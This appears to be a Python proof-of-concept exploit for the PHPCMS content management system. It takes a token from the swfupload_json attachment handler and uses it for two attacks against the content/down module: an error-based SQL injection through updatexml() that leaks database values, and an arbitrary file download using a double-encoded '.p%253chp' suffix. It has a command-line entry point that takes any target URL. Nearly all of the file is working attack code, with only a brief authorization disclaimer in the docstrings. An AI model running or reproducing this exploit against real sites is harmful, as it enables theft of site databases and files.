# -*- coding: utf-8 -*-
# @Author: King kaki
# @Date:   2018-07-08 16:08:31
# @Last Modified by:   King kaki
# @Last Modified time: 2018-07-14 12:21:34
import re
import sys
from urllib.parse import urljoin

import requests

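class PHPCMS():
	"""Proof-of-concept client for a PHPCMS target.

	The flow implemented here is: fetch a cookie from ``index.php?m=wap``,
	post its value as ``userid_flash`` to the ``swfupload_json`` attachment
	handler together with an attacker-chosen ``src`` value, read back the
	``att_json`` cookie the server sets (the ``a_k`` token), and hand that
	token to ``index.php?m=content&c=down`` to trigger either an error-based
	SQL injection (:meth:`sqli`) or a file download (:meth:`filedown`).

	Use only against systems you are explicitly authorized to test.  Every
	request honours ``timeout`` so a non-responsive host cannot hang the
	tool indefinitely; network errors from ``requests`` propagate to the
	caller unchanged.
	"""

	# The original PoC sliced a fixed 13 characters off the raw Set-Cookie
	# header to isolate the cookie *value*, i.e. it assumes "<name>=" is
	# exactly 13 bytes.  NOTE(review): presumably the PHPCMS cookie prefix
	# followed by "siteid=" -- confirm against the target before relying on it.
	_SITEID_COOKIE_NAME_LEN = 13

	def __init__(self, url, *, timeout=10):
		"""Create a client for *url*.

		Args:
			url: target base URL; a missing scheme defaults to ``http://``
				and a trailing ``/`` is added (see :meth:`_genurl`).
			timeout: seconds passed to every HTTP request.
		"""
		self.url = self._genurl(url)
		self.timeout = timeout

	def _genurl(self, url):
		"""Normalise *url* to ``<scheme>://<host>[/<path>]/``.

		Surrounding whitespace is stripped, ``http://`` is prepended when the
		string does not already start with ``http`` (so ``https://`` is kept
		as-is), and a single trailing slash is guaranteed so the
		``index.php?...`` suffixes below can be concatenated directly.
		"""
		url = url.strip()
		if not url.startswith('http'):
			url = 'http://' + url
		return url if url.endswith('/') else url + '/'

	def _getuserid(self):
		"""Return the cookie value the target sets on ``index.php?m=wap``.

		Raises:
			RuntimeError: the response carries no ``Set-Cookie`` header, or one
				too short to contain a value after the fixed-width name -- the
				original code would have silently returned an empty string.
		"""
		r = requests.get(self.url + 'index.php?m=wap', timeout=self.timeout)
		cookie = r.headers.get('Set-Cookie', '')
		if len(cookie) <= self._SITEID_COOKIE_NAME_LEN:
			raise RuntimeError(
				'target did not set the expected cookie on index.php?m=wap '
				'(got %r); is this a PHPCMS install?' % cookie)
		return cookie[self._SITEID_COOKIE_NAME_LEN:]

	def get_auth(self, payload):
		"""Obtain an ``a_k`` token that wraps *payload*.

		*payload* is sent as the ``src`` query parameter of the
		``swfupload_json`` handler, with the value from :meth:`_getuserid` as
		``userid_flash``.  The server's ``Set-Cookie`` header is scanned for a
		cookie whose name contains ``att_json``; its value is returned.

		Returns:
			The token string, or ``False`` when no such cookie was set (also
			when the response has no ``Set-Cookie`` header at all).
		"""
		url = self.url + 'index.php?m=attachment&c=attachments&a=swfupload_json&aid=1'
		userid = self._getuserid()

		r = requests.post(url, params={'src': payload},
		                  data={'userid_flash': userid}, timeout=self.timeout)

		# Tolerate a missing header instead of raising KeyError; "no cookie"
		# is the normal outcome against a non-vulnerable target.
		cookies = re.findall(r'([^;, ]+)=([^;, ]+)', r.headers.get('Set-Cookie', ''))
		for name, value in cookies:
			if 'att_json' in name:
				return value
		return False

	def sqli(self, expr='database()'):
		"""Error-based SQL injection through the ``content/down`` module.

		*expr* is the SQL expression whose value is leaked inside the MySQL
		``XPATH syntax error`` message produced by ``updatexml()``; the default
		reproduces the original hard-coded ``database()`` probe.
		NOTE(review): MySQL truncates the text echoed in that error, so long
		results will need ``substr()`` windows -- confirm on the target version.

		Returns:
			List of strings captured from ``XPATH syntax error: '...'`` in the
			response body (empty when nothing leaked).  Also printed for CLI use.

		Raises:
			RuntimeError: no ``a_k`` token could be obtained.
		"""
		url = self.url + 'index.php?m=content&c=down'
		payload = ("&id=%2*7and updatexml(1,concat(1,({})),1)#"
		           "&m=1&modelid=1&catid=1&f=1").format(expr)
		a_k = self.get_auth(payload)
		if a_k is False:
			raise RuntimeError('no att_json cookie returned; could not obtain an a_k token')

		r = requests.get(url, params={'a_k': a_k}, timeout=self.timeout)
		leaked = re.findall(r"XPATH syntax error: '(.+?)'", r.text)
		print(leaked)
		return leaked

	def filedown(self, filename):
		"""Download *filename* via the ``content/down`` init/download pages.

		The ``a_k`` token wraps a download descriptor naming ``filename`` with
		the suffix ``.p%253chp`` (double-encoded ``.p<hp``); the ``a=init``
		page is then scraped for the ``xzs_btn`` anchor and the link it points
		at is fetched.

		Returns:
			The body of the final download response, or ``None`` when the
			anchor was not found (``error`` is printed in that case, as before).

		Raises:
			RuntimeError: no ``a_k`` token could be obtained.
		"""
		url = self.url + 'index.php?m=content&c=down&a=init'
		payload = r'pad=x&i=1&modelid=1&catid=1&d=1&m=1&s={}&f=.p%253chp'.format(filename)
		a_k = self.get_auth(payload)
		if a_k is False:
			raise RuntimeError('no att_json cookie returned; could not obtain an a_k token')

		r = requests.get(url, params={'a_k': a_k}, timeout=self.timeout)
		match = re.search(r'<a href="(.+?)" class="xzs_btn"', r.text)
		if match is None:
			print('error')
			return None

		# The original appended the href to "index.php", i.e. it expects a
		# "?m=..." query-only link; urljoin keeps that case identical and also
		# copes with a relative or absolute href.  NOTE(review): an HTML-escaped
		# href (``&amp;``) is passed through unchanged, as in the original.
		download_url = urljoin(self.url + 'index.php', match.group(1))
		r = requests.get(download_url, timeout=self.timeout)
		print(r.text)
		return r.text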


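def main():
	"""CLI entry point: ``python <script> <target-url> [filename]``.

	The target is taken from the command line instead of being hard-coded,
	so the script cannot be run against an unintended host by accident.
	*filename* defaults to ``index`` (the original's choice).  Exits with
	status 2 and a usage line when no target is given.
	"""
	if len(sys.argv) < 2:
		print('usage: {} <target-url> [file-to-download]'.format(sys.argv[0]))
		sys.exit(2)
	target = sys.argv[1]
	filename = sys.argv[2] if len(sys.argv) > 2 else 'index'

	exp = PHPCMS(target)
	exp.filedown(filename)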
	# print(exp.get_auth('pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=index&f=.p%253chp'))



if __name__ == "__main__":
	# Run the CLI only when executed directly, never on import.
	main()




